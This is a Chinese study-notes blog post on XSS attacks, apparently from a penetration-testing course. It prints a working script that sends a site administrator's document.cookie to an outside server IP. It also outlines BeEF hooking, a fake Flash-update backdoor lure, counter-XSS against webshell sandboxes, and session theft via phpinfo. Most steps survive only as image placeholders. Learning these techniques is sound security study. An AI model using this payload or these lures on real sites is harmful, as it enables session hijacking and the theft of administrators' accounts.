[小迪安全25-26天]xss

通过提交订单的方式植入xss来获取网站管理员cookie
在这里插入图片描述
在这里插入图片描述

简单测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

窃取cookie

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
https://www.postman.com/downloads/下载postman
在这里插入图片描述
在这里插入图片描述

本地构造实现xss攻击1

本地服务器端39.96.44.170 文件jieshou.php在这里插入图片描述

<script>
    new Image().src =
        "http://39.96.44.170/jieshou.php?c=" + encodeURI(document.cookie);
</script>

在这里插入图片描述

在这里插入图片描述

方法2

本地加载js脚本

在这里插入图片描述
在这里插入图片描述

webshell沙箱反杀

就是使用别人的webshell来进行获取服务器shell,但获取shell后webshell存在的恶意代码就会把网站信息和webshell密码,和用户名发到webshell的原主人来进行信息收集,通过大量获取的网站shell来进行贩卖,而使用webshell的人就成打工仔
反杀的意思就是像上面的窃取cookie道理一样通过向webshell的代码中插入窃取cookie的代码,当webshell 原注入查看沙箱时就会触发xss窃取cookie来达到反客为主

在这里插入图片描述
webshell 中的恶意代码
把网站信息发送到指定地址
在这里插入图片描述
成功发送到沙箱

反杀操作

webshell中的恶意代码
在这里插入图片描述
通过访问webshll来植入xss代码窃取cookie
在这里插入图片描述
在这里插入图片描述
殊不知cooKie已被窃取
在这里插入图片描述
登录沙箱后台
在这里插入图片描述

演示存在后门的大马

通过打开webshell进行抓包测试发现向恶意网站发送信息
在这里插入图片描述
发送的代码
在这里插入图片描述
内容为网站地址和webshell密码

beef结合xss攻击

启动beef在这里插入图片描述
在这里插入图片描述
后台管理员查看订单触发xss
成功上线在这里插入图片描述
在这里插入图片描述

社工攻击(利用flash更新)
利用模拟flash更新向客户端发送请求,来实现下载后门在这里插入图片描述
客户端显示
在这里插入图片描述
点击就下载后门

获取session思路

因为当访问php探针时就会携带session
在这里插入图片描述
如果能利用xss让管理员页面跳转到phpinfo()页面,通过返回页面源码就能窃取session
利用beef进行页面跳转
在这里插入图片描述
获取页面源码在这里插入图片描述
获取源码中的cookie和session
在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值